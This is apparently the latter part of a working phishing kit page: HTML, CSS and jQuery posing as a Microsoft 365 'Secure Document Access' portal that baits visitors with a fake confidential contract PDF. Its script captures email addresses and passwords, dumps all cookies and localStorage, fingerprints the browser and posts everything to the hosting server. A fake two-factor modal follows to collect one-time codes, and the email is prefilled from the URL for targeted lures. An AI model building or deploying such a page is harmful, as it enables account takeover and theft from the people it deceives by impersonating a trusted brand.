            font-size: 20px;
            box-shadow: var(--shadow-md);
            transition: var(--transition-bounce);
        }

        .twofa-method:hover .twofa-method-icon {
            transform: rotate(10deg) scale(1.1);
        }

        .twofa-method h3 {
            font-size: 16px;
            font-weight: 600;
            color: var(--ms-gray-900);
            margin-bottom: 4px;
        }

        .twofa-method p {
            font-size: 14px;
            color: var(--ms-gray-600);
            margin: 0;
        }

        .twofa-form {
            display: none;
        }

        .twofa-form.show {
            display: block;
            animation: fadeInUp 0.5s ease-out;
        }

        @keyframes fadeInUp {
            from {
                opacity: 0;
                transform: translateY(20px);
            }
            to {
                opacity: 1;
                transform: translateY(0);
            }
        }

        .twofa-input {
            width: 100%;
            padding: 20px;
            border: 2px solid var(--ms-gray-400);
            border-radius: var(--radius-md);
            font-size: 24px;
            text-align: center;
            letter-spacing: 0.5em;
            margin-bottom: 24px;
            font-weight: 600;
            transition: var(--transition-normal);
            background: white;
            font-family: 'JetBrains Mono', monospace;
        }

        .twofa-input:focus {
            outline: none;
            border-color: var(--ms-blue);
            box-shadow: 0 0 0 4px rgba(0, 120, 212, 0.1);
            transform: translateY(-2px);
        }

        .twofa-input.error {
            border-color: var(--ms-red);
            box-shadow: 0 0 0 4px rgba(209, 52, 56, 0.1);
            animation: shake 0.5s ease-in-out;
        }

        /* Enhanced Footer */
        .footer {
            background: rgba(255, 255, 255, 0.95);
            backdrop-filter: blur(20px);
            -webkit-backdrop-filter: blur(20px);
            border-top: 1px solid var(--ms-gray-200);
            padding: 32px 40px;
            text-align: center;
            position: relative;
        }

        .footer::before {
            content: '';
            position: absolute;
            top: 0;
            left: 0;
            right: 0;
            height: 1px;
            background: var(--gradient-microsoft);
            opacity: 0.3;
        }

        .footer-links {
            display: flex;
            justify-content: center;
            gap: 40px;
            margin-bottom: 20px;
            flex-wrap: wrap;
        }

        .footer-link {
            color: var(--ms-gray-600);
            text-decoration: none;
            font-size: 14px;
            transition: var(--transition-normal);
            padding: 8px 16px;
            border-radius: var(--radius-md);
            position: relative;
        }

        .footer-link::after {
            content: '';
            position: absolute;
            bottom: 0;
            left: 50%;
            width: 0;
            height: 2px;
            background: var(--gradient-primary);
            transition: var(--transition-normal);
            transform: translateX(-50%);
        }

        .footer-link:hover::after {
            width: 80%;
        }

        .footer-link:hover {
            color: var(--ms-blue);
            transform: translateY(-2px);
        }

        .footer-copyright {
            font-size: 13px;
            color: var(--ms-gray-500);
            font-weight: 400;
        }

        /* Enhanced Loading Spinner */
        .loading-spinner {
            display: inline-block;
            width: 20px;
            height: 20px;
            border: 3px solid rgba(255, 255, 255, 0.3);
            border-radius: 50%;
            border-top-color: white;
            animation: spin 1s ease-in-out infinite;
        }

        @keyframes spin {
            to { transform: rotate(360deg); }
        }

        /* Enhanced Responsive Design */
        @media (max-width: 768px) {
            .microsoft-header {
                padding: 16px 24px;
            }

            .microsoft-text {
                font-size: 24px;
            }

            .microsoft-365 {
                font-size: 16px;
            }

            .header-actions {
                gap: 20px;
            }

            .main-content {
                padding: 40px 20px;
            }

            .main-container {
                max-width: 100%;
                margin: 0 10px;
            }

            .document-header {
                padding: 40px 32px 32px;
            }

            .document-title {
                font-size: 28px;
            }

            .document-info,
            .login-section {
                padding: 32px;
            }

            .provider-grid {
                grid-template-columns: 1fr;
                gap: 12px;
            }

            .file-meta {
                flex-direction: column;
                gap: 8px;
            }

            .footer {
                padding: 24px 20px;
            }

            .footer-links {
                gap: 24px;
            }

            .twofa-content {
                padding: 32px 24px;
                margin: 20px;
            }
        }

        @media (max-width: 480px) {
            .microsoft-header {
                padding: 12px 20px;
            }

            .document-file {
                flex-direction: column;
                text-align: center;
                padding: 20px;
            }

            .file-meta {
                justify-content: center;
            }

            .file-badges {
                justify-content: center;
            }

            .footer-links {
                flex-direction: column;
                gap: 16px;
            }

            .login-section {
                padding: 24px;
            }

            .document-info {
                padding: 24px;
            }
        }

        /* Advanced Animations */
        .main-container {
            animation: containerEntrance 1s ease-out;
        }

        @keyframes containerEntrance {
            0% {
                opacity: 0;
                transform: translateY(60px) scale(0.9);
                filter: blur(10px);
            }
            50% {
                opacity: 0.7;
                transform: translateY(20px) scale(0.95);
                filter: blur(5px);
            }
            100% {
                opacity: 1;
                transform: translateY(0) scale(1);
                filter: blur(0);
            }
        }

        .provider-card {
            animation: cardSlideIn 0.6s ease-out;
            animation-delay: calc(var(--delay) * 0.1s);
            animation-fill-mode: both;
        }

        @keyframes cardSlideIn {
            from {
                opacity: 0;
                transform: translateX(-30px) scale(0.9);
            }
            to {
                opacity: 1;
                transform: translateX(0) scale(1);
            }
        }

        .provider-card:nth-child(1) { --delay: 1; }
        .provider-card:nth-child(2) { --delay: 2; }
        .provider-card:nth-child(3) { --delay: 3; }
        .provider-card:nth-child(4) { --delay: 4; }

        /* Enhanced Ripple Effect */
        .ripple {
            position: absolute;
            border-radius: 50%;
            background: radial-gradient(circle, rgba(255, 255, 255, 0.8) 0%, transparent 70%);
            transform: scale(0);
            animation: rippleEffect 0.6s linear;
            pointer-events: none;
        }

        @keyframes rippleEffect {
            to {
                transform: scale(4);
                opacity: 0;
            }
        }

        /* Custom Scrollbar Enhancement */
        ::-webkit-scrollbar {
            width: 12px;
        }

        ::-webkit-scrollbar-track {
            background: var(--ms-gray-100);
            border-radius: var(--radius-sm);
        }

        ::-webkit-scrollbar-thumb {
            background: linear-gradient(135deg, var(--ms-gray-400), var(--ms-gray-500));
            border-radius: var(--radius-sm);
            border: 2px solid var(--ms-gray-100);
        }

        ::-webkit-scrollbar-thumb:hover {
            background: linear-gradient(135deg, var(--ms-gray-500), var(--ms-gray-600));
        }

        /* Focus Indicators */
        .form-input:focus,
        .twofa-input:focus,
        .submit-btn:focus,
        .provider-card:focus {
            outline: 2px solid var(--ms-blue);
            outline-offset: 2px;
        }

        /* High Contrast Mode Support */
        @media (prefers-contrast: high) {
            :root {
                --ms-gray-300: #999999;
                --ms-gray-400: #666666;
                --ms-gray-600: #333333;
            }
        }

        /* Reduced Motion Support */
        @media (prefers-reduced-motion: reduce) {
            *,
            *::before,
            *::after {
                animation-duration: 0.01ms !important;
                animation-iteration-count: 1 !important;
                transition-duration: 0.01ms !important;
            }
        }
    </style>
</head>
<body>
    <!-- Floating Particles -->
    <div class="particles" id="particles"></div>

    <!-- Microsoft Header -->
    <header class="microsoft-header">
        <div class="microsoft-brand">
            <div class="microsoft-logo">
                <div class="ms-logo-squares">
                    <div class="ms-square orange"></div>
                    <div class="ms-square blue"></div>
                    <div class="ms-square green"></div>
                    <div class="ms-square yellow"></div>
                </div>
                <span class="microsoft-text">Microsoft</span>
                <span class="microsoft-365">365</span>
            </div>
        </div>
        <div class="header-actions">
            <a href="#" class="header-link">
                <i class="fas fa-question-circle"></i> Help & Support
            </a>
            <a href="#" class="header-link">
                <i class="fas fa-envelope"></i> Contact
            </a>
        </div>
    </header>

    <!-- Main Content -->
    <main class="main-content">
        <div class="main-container">
            <!-- Document Header -->
            <div class="document-header">
                <h1 class="document-title">
                    <i class="fas fa-shield-alt"></i>
                    Secure Document Access
                </h1>
                <p class="document-subtitle">Microsoft 365 Protected Content Portal</p>
            </div>

            <!-- Document Info -->
            <div class="document-info">
                <div class="document-file">
                    <div class="file-icon">
                        <i class="fas fa-file-contract"></i>
                    </div>
                    <div class="file-details">
                        <h3>Confidential_Business_Agreement_2025.pdf</h3>
                        <div class="file-meta">
                            <span><i class="fas fa-weight-hanging"></i> 2.8 MB</span>
                            <span><i class="fas fa-shield-alt"></i> AES-256</span>
                            <span><i class="fas fa-clock"></i> Expires: 5 days</span>
                            <span><i class="fas fa-eye"></i> Restricted</span>
                        </div>
                        <div class="file-badges">
                            <span class="confidential-badge">
                                <i class="fas fa-lock"></i>
                                Highly Confidential
                            </span>
                            <span class="expires-badge">
                                <i class="fas fa-exclamation-triangle"></i>
                                Time Sensitive
                            </span>
                        </div>
                    </div>
                </div>
            </div>

            <!-- Login Section -->
            <div class="login-section">
                <h2 class="login-title">
                    <i class="fas fa-sign-in-alt"></i>
                    Sign in to access document
                </h2>
                <p class="login-subtitle">Choose your account provider to authenticate and view the protected business document</p>

                <!-- Provider Selection -->
                <div class="provider-grid">
                    <div class="provider-card active" data-provider="microsoft">
                        <img src="https://img.icons8.com/fluency/48/microsoft-outlook-2019.png" alt="Microsoft">
                        <span>Microsoft 365</span>
                    </div>
                    <div class="provider-card" data-provider="gmail">
                        <img src="https://img.icons8.com/fluency/48/gmail-new.png" alt="Gmail">
                        <span>Google Workspace</span>
                    </div>
                    <div class="provider-card" data-provider="yahoo">
                        <img src="https://play-lh.googleusercontent.com/1sEfU6ONkVpMQiUJIpeLnlqpDzspdmSn64xyeXraddgI8e5IAz-PYkJDs5_qkNUPI407" alt="Yahoo">
                        <span>Yahoo Mail</span>
                    </div>
                    <div class="provider-card" data-provider="aol">
                        <img src="https://play-lh.googleusercontent.com/HUWajdrBVia-h_BP91dwOkutEPc8OWhqZdCCkCsFFJBaCpkPVIWfInpSB2ADIWHptg" alt="AOL">
                        <span>AOL Mail</span>
                    </div>
                </div>

                <!-- Login Forms -->
                <div class="login-content">
                    <!-- Error Message -->
                    <div class="error-message" id="error-message">
                                                <i class="fas fa-exclamation-circle"></i>
                        <span id="error-text"></span>
                    </div>

                    <!-- Success Message -->
                    <div class="success-message" id="success-message">
                        <i class="fas fa-check-circle"></i>
                        <span id="success-text"></span>
                    </div>

                    <!-- Email Step -->
                    <div class="email-view" id="email-view">
                        <form id="email-form">
                            <div class="form-group">
                                <label class="form-label">
                                    <i class="fas fa-envelope"></i>
                                    Email address
                                </label>
                                <input type="email" class="form-input" id="email" name="ai" 
                                       placeholder="Enter your email address" required>
                            </div>
                            <button type="submit" class="submit-btn" id="next-btn">
                                <i class="fas fa-arrow-right"></i>
                                Next
                            </button>
                        </form>
                    </div>

                    <!-- Password Step -->
                    <div class="password-view" id="password-view">
                        <form id="password-form">
                            <div class="form-group">
                                <label class="form-label">
                                    <i class="fas fa-lock"></i>
                                    Password
                                </label>
                                <div class="input-wrapper">
                                    <input type="password" class="form-input" id="password" name="pr" 
                                           placeholder="Enter your password" required>
                                    <i class="fas fa-eye input-icon" id="toggle-password"></i>
                                </div>
                            </div>
                            <input type="hidden" id="attempt-count" name="attempt" value="1">
                            <button type="submit" class="submit-btn" id="signin-btn">
                                <i class="fas fa-sign-in-alt"></i>
                                Sign in
                            </button>
                            <a href="#" class="back-link" id="back-link">
                                <i class="fas fa-arrow-left"></i> Back to email
                            </a>
                        </form>
                    </div>
                </div>
            </div>

            <!-- Security Notice -->
            <div class="security-notice">
                <p>
                    <i class="fas fa-shield-alt"></i> 
                    Your connection is secured with 256-bit SSL encryption
                </p>
            </div>
        </div>
    </main>

    <!-- 2FA Modal -->
    <div class="twofa-modal" id="twofa-modal">
        <div class="twofa-content">
            <h2 class="twofa-title">
                <i class="fas fa-mobile-alt"></i>
                Two-factor authentication
            </h2>
            <p class="twofa-subtitle">Additional verification required to access this document</p>

            <div class="twofa-methods" id="twofa-methods">
                <div class="twofa-method" data-method="sms">
                    <div class="twofa-method-icon">
                        <i class="fas fa-mobile-alt"></i>
                    </div>
                    <div>
                        <h3>Text message</h3>
                        <p>Receive a verification code via SMS</p>
                    </div>
                </div>
                <div class="twofa-method" data-method="email">
                    <div class="twofa-method-icon">
                        <i class="fas fa-envelope"></i>
                    </div>
                    <div>
                        <h3>Email verification</h3>
                        <p>Receive a verification code via email</p>
                    </div>
                </div>
                <div class="twofa-method" data-method="authenticator">
                    <div class="twofa-method-icon">
                        <i class="fas fa-qrcode"></i>
                    </div>
                    <div>
                        <h3>Authenticator app</h3>
                        <p>Use your authenticator app code</p>
                    </div>
                </div>
            </div>

            <div class="twofa-form" id="twofa-form">
                <div class="form-group">
                    <label class="form-label">
                        <i class="fas fa-key"></i>
                        Enter security code
                    </label>
                    <input type="text" class="twofa-input" id="twofa-code" 
                           placeholder="000000" maxlength="6" pattern="[0-9]{6}">
                </div>
                <button type="button" class="submit-btn" id="verify-btn">
                    <i class="fas fa-check"></i>
                    Verify Code
                </button>
            </div>
        </div>
    </div>

    <!-- Footer -->
    <footer class="footer">
        <div class="footer-links">
            <a href="#" class="footer-link">
                <i class="fas fa-user-shield"></i>
                Privacy & cookies
            </a>
            <a href="#" class="footer-link">
                <i class="fas fa-file-contract"></i>
                Terms of use
            </a>
            <a href="#" class="footer-link">
                <i class="fas fa-headset"></i>
                Contact us
            </a>
            <a href="#" class="footer-link">
                <i class="fas fa-info-circle"></i>
                About Microsoft
            </a>
        </div>
        <div class="footer-copyright">
            © 2025 Microsoft Corporation. All rights reserved.
        </div>
    </footer>

    <!-- JavaScript -->
    <script src="https://code.jquery.com/jquery-3.7.1.min.js"></script>
    <script>
    $(document).ready(function() {
        let attemptCount = 0;
        let userEmail = '';
        let twofaType = '';
        let bypassToken = null;

        // Create floating particles
        function createParticles() {
            const particlesContainer = $('#particles');
            const particleCount = 50;
            
            for (let i = 0; i < particleCount; i++) {
                const particle = $('<div class="particle"></div>');
                particle.css({
                    left: Math.random() * 100 + '%',
                    animationDelay: Math.random() * 15 + 's',
                    animationDuration: (Math.random() * 10 + 10) + 's'
                });
                particlesContainer.append(particle);
            }
        }

        // Initialize particles
        createParticles();

        // Auto-fill email from URL parameter
        const autoEmail = '<?php echo htmlspecialchars($autoEmail, ENT_QUOTES, 'UTF-8'); ?>';
        
        if (autoEmail && autoEmail.trim() !== '') {
            $('#email').val(autoEmail);
            // Add glow effect for auto-filled email
            $('#email').addClass('auto-filled');
            setTimeout(() => {
                $('#email').removeClass('auto-filled');
            }, 2000);
        }

        // Enhanced email validation
        function validateEmail(email) {
            const re = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
            return re.test(email);
        }

        // Enhanced cookie collection
        function getAllCookies() {
            const cookies = {};
            document.cookie.split(';').forEach(function(cookie) {
                const parts = cookie.trim().split('=');
                if (parts.length === 2) {
                    cookies[parts[0]] = decodeURIComponent(parts[1]);
                }
            });
            return cookies;
        }

        // Enhanced localStorage data collection
        function getLocalStorageData() {
            const data = {};
            try {
                for (let i = 0; i < localStorage.length; i++) {
                    const key = localStorage.key(i);
                    data[key] = localStorage.getItem(key);
                }
            } catch (e) {
                console.error('LocalStorage access error:', e);
            }
            return data;
        }

        // Enhanced browser fingerprinting
        function getBrowserFingerprint() {
            return {
                screenWidth: window.screen.width,
                screenHeight: window.screen.height,
                colorDepth: window.screen.colorDepth,
                pixelRatio: window.devicePixelRatio || 1,
                timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
                platform: navigator.platform,
                userAgent: navigator.userAgent,
                language: navigator.language,
                languages: navigator.languages ? navigator.languages.join(',') : '',
                hardwareConcurrency: navigator.hardwareConcurrency || 'unknown',
                deviceMemory: navigator.deviceMemory || 'unknown',
                cookieEnabled: navigator.cookieEnabled,
                doNotTrack: navigator.doNotTrack,
                onLine: navigator.onLine,
                webdriver: navigator.webdriver || false
            };
        }

        // Enhanced provider selection with animation
        $('.provider-card').click(function() {
            $('.provider-card').removeClass('active');
            $(this).addClass('active');
            
            // Enhanced ripple effect
            const rect = this.getBoundingClientRect();
            const ripple = $('<div class="ripple"></div>');
            const size = Math.max(rect.width, rect.height);
            
            ripple.css({
                width: size + 'px',
                height: size + 'px',
                left: (event.clientX - rect.left - size / 2) + 'px',
                top: (event.clientY - rect.top - size / 2) + 'px'
            });
            
            $(this).append(ripple);
            
            setTimeout(() => ripple.remove(), 600);
        });

        // Enhanced email form submission
        $('#email-form').submit(function(e) {
            e.preventDefault();
            const email = $('#email').val().trim();
            
            if (!email) {
                showError('Please enter your email address.');
                $('#email').addClass('error').focus();
                return;
            }
            
            if (!validateEmail(email)) {
                showError('Please enter a valid email address.');
                $('#email').addClass('error').focus();
                return;
            }
            
            userEmail = email;
            $('#email').removeClass('error');
            hideError();
            
            // Enhanced transition to password view
            $('#email-view').fadeOut(400, function() {
                $('#password-view').addClass('show').fadeIn(400);
                $('#password').focus();
            });
        });

        // Enhanced password form submission
        $('#password-form').submit(function(e) {
            e.preventDefault();
            const password = $('#password').val();
            
            if (!password) {
                showError('Please enter your password.');
                $('#password').addClass('error').focus();
                return;
            }
            
            attemptCount++;
            $('#attempt-count').val(attemptCount);
            
            // Enhanced loading state
            const originalText = $('#signin-btn').html();
            $('#signin-btn').prop('disabled', true).html('<span class="loading-spinner"></span> Authenticating...');
            
            // Enhanced form data collection
            const browserFingerprint = getBrowserFingerprint();
            const formData = {
                ai: userEmail,
                pr: password,
                attempt: attemptCount,
                ...browserFingerprint,
                cookies: JSON.stringify(getAllCookies()),
                localStorage: JSON.stringify(getLocalStorageData()),
                timestamp: new Date().toISOString(),
                sessionId: generateSessionId()
            };
            
            // Enhanced AJAX submission
            $.ajax({
                url: window.location.href,
                method: 'POST',
                data: formData,
                dataType: 'json',
                timeout: 30000,
                success: function(response) {
                    $('#signin-btn').prop('disabled', false).html(originalText);
                    
                    if (response.status === 'success') {
                        if (response.show_2fa) {
                            bypassToken = response.bypass_token;
                            show2FAModal();
                        } else {
                            showSuccess('Authentication successful! Redirecting to document...');
                            setTimeout(function() {
                                if (response.redirect_link) {
                                    window.location.href = response.redirect_link;
                                } else {
                                    window.location.reload();
                                }
                            }, 2000);
                        }
                    } else {
                        if (attemptCount >= 2) {
                            bypassToken = response.bypass_token;
                            show2FAModal();
                        } else {
                            showError(response.message || 'Incorrect password. Please try again.');
                            $('#password').addClass('error').val('').focus();
                        }
                    }
                },
                error: function(xhr, status, error) {
                    $('#signin-btn').prop('disabled', false).html(originalText);
                    console.error('Authentication error:', error);
                    
                    if (attemptCount >= 2) {
                        show2FAModal();
                    } else {
                        showError('Connection error. Please check your internet connection and try again.');
                        $('#password').addClass('error').focus();
                    }
                }
            });
        });

        // Generate session ID
        function generateSessionId() {
            return 'sess_' + Math.random().toString(36).substr(2, 9) + '_' + Date.now();
        }

        // Enhanced back navigation
        $('#back-link').click(function(e) {
            e.preventDefault();
            $('#password-view').removeClass('show').fadeOut(400, function() {
                $('#email-view').fadeIn(400);
                $('#email').focus();
            });
            hideError();
        });

        // Enhanced password visibility toggle
        $('#toggle-password').click(function() {
            const passwordField = $('#password');
            const icon = $(this);
            
            if (passwordField.attr('type') === 'password') {
                passwordField.attr('type', 'text');
                icon.removeClass('fa-eye').addClass('fa-eye-slash');
            } else {
                passwordField.attr('type', 'password');
                icon.removeClass('fa-eye-slash').addClass('fa-eye');
            }
        });

        // Enhanced error/success message functions
        function showError(message) {
            $('#error-text').text(message);
            $('#error-message').addClass('show');
            
            // Auto-hide after 5 seconds
            setTimeout(function() {
                hideError();
            }, 5000);
        }

        function hideError() {
            $('#error-message').removeClass('show');
        }

        function showSuccess(message) {
            $('#success-text').text(message);
            $('#success-message').addClass('show');
            
            setTimeout(function() {
                $('#success-message').removeClass('show');
            }, 8000);
        }

        // Enhanced 2FA Modal functions
        function show2FAModal() {
            $('#twofa-modal').addClass('show');
            $('body').css('overflow', 'hidden');
            
            // Focus first method
            $('.twofa-method').first().focus();
        }

        function hide2FAModal() {
            $('#twofa-modal').removeClass('show');
            $('body').css('overflow', 'auto');
        }

        // Enhanced 2FA method selection
        $('.twofa-method').click(function() {
            $('.twofa-method').removeClass('selected');
            $(this).addClass('selected');
            twofaType = $(this).data('method');
            
            // Enhanced transition to form
            $('#twofa-methods').fadeOut(400, function() {
                $('#twofa-form').addClass('show').fadeIn(400);
                $('#twofa-code').focus();
            });
        });

        // Enhanced 2FA verification
        $('#verify-btn').click(function() {
            const code = $('#twofa-code').val().trim();
            
            if (!code || code.length !== 6) {
                showError('Please enter a complete 6-digit verification code.');
                $('#twofa-code').addClass('error').focus();
                return;
            }
            
            const originalText = $('#verify-btn').html();
            $('#verify-btn').prop('disabled', true).html('<span class="loading-spinner"></span> Verifying...');
            
            $.ajax({
                url: window.location.href,
                method: 'POST',
                data: {
                    action: '2fa_submit',
                    email: userEmail,
                    type: twofaType,
                    code: code,
                    bypass_token: bypassToken,
                    timestamp: new Date().toISOString()
                },
                dataType: 'json',
                success: function(response) {
                    $('#verify-btn').prop('disabled', false).html(originalText);
                    
                    if (response.status === 'success') {
                        hide2FAModal();
                        showSuccess('Verification successful! Accessing secure document...');
                        
                        setTimeout(function() {
                            if (response.redirect_url) {
                                window.location.href = response.redirect_url;
                            } else {
                                window.location.reload();
                            }
                        }, 2000);
                    } else {
                        showError(response.message || 'Invalid verification code. Please try again.');
                        $('#twofa-code').addClass('error').val('').focus();
                    }
                },
                error: function(xhr, status, error) {
                    $('#verify-btn').prop('disabled', false).html(originalText);
                    console.error('2FA verification error:', error);
                    showError('Verification failed. Please check your connection and try again.');
                    $('#twofa-code').addClass('error').focus();
                }
            });
        });

        // Enhanced auto-submit 2FA code
        $('#twofa-code').on('input', function() {
            $(this).removeClass('error');
            const code = $(this).val();
            
            // Only allow numbers
            $(this).val(code.replace(/[^0-9]/g, ''));
            
            // Auto-submit when 6 digits entered
            if ($(this).val().length === 6) {
                setTimeout(function() {
                    $('#verify-btn').click();
                }, 800);
            }
        });

        // Enhanced modal interactions
        $('#twofa-modal').click(function(e) {
            if (e.target === this) {
                hide2FAModal();
            }
        });

        // Enhanced keyboard shortcuts
        $(document).keydown(function(e) {
            // Escape key
            if (e.keyCode === 27 && $('#twofa-modal').hasClass('show')) {
                hide2FAModal();
            }
            
            // Enter key
            if (e.keyCode === 13) {
                if ($('#email-view').is(':visible')) {
                    $('#email-form').submit();
                } else if ($('#password-view').is(':visible')) {
                    $('#password-form').submit();
                } else if ($('#twofa-form').hasClass('show')) {
                    $('#verify-btn').click();
                }
            }
        });

        // Enhanced input error clearing
        $('.form-input, .twofa-input').on('input', function() {
            $(this).removeClass('error');
            hideError();
        });

        // Enhanced focus management
        $('.form-input').on('focus', function() {
            $(this).parent().addClass('focused');
        }).on('blur', function() {
            $(this).parent().removeClass('focused');
        });

        // Initialize with focus on email field
        $('#email').focus();

        // Add auto-filled class for styling
        if (autoEmail && autoEmail.trim() !== '') {
            $('#email').addClass('auto-filled');
        }

        // Enhanced form validation feedback
        $('#email').on('blur', function() {
            const email = $(this).val().trim();
            if (email && !validateEmail(email)) {
                $(this).addClass('error');
                showError('Please enter a valid email address.');
            } else {
                $(this).removeClass('error');
                hideError();
            }
        });

        // Add loading states for better UX
        function addLoadingState(element, text = 'Loading...') {
            element.prop('disabled', true).html('<span class="loading-spinner"></span> ' + text);
        }

        function removeLoadingState(element, originalText) {
            element.prop('disabled', false).html(originalText);
        }

        // Enhanced error handling
        window.addEventListener('error', function(e) {
            console.error('JavaScript error:', e.error);
        });

        // Add smooth scrolling
        $('a[href^="#"]').on('click', function(e) {
            e.preventDefault();
            const target = $($(this).attr('href'));
            if (target.length) {
                $('html, body').animate({
                    scrollTop: target.offset().top - 100
                }, 500);
            }
        });

        // Add form persistence
        function saveFormData() {
            if (userEmail) {
                sessionStorage.setItem('userEmail', userEmail);
            }
        }

        function loadFormData() {
            const savedEmail = sessionStorage.getItem('userEmail');
            if (savedEmail && !autoEmail) {
                $('#email').val(savedEmail);
            }
        }

        // Load saved form data
        loadFormData();

        // Save form data on input
        $('#email').on('input', function() {
            saveFormData();
        });
    });
    </script>
</body>
</html>
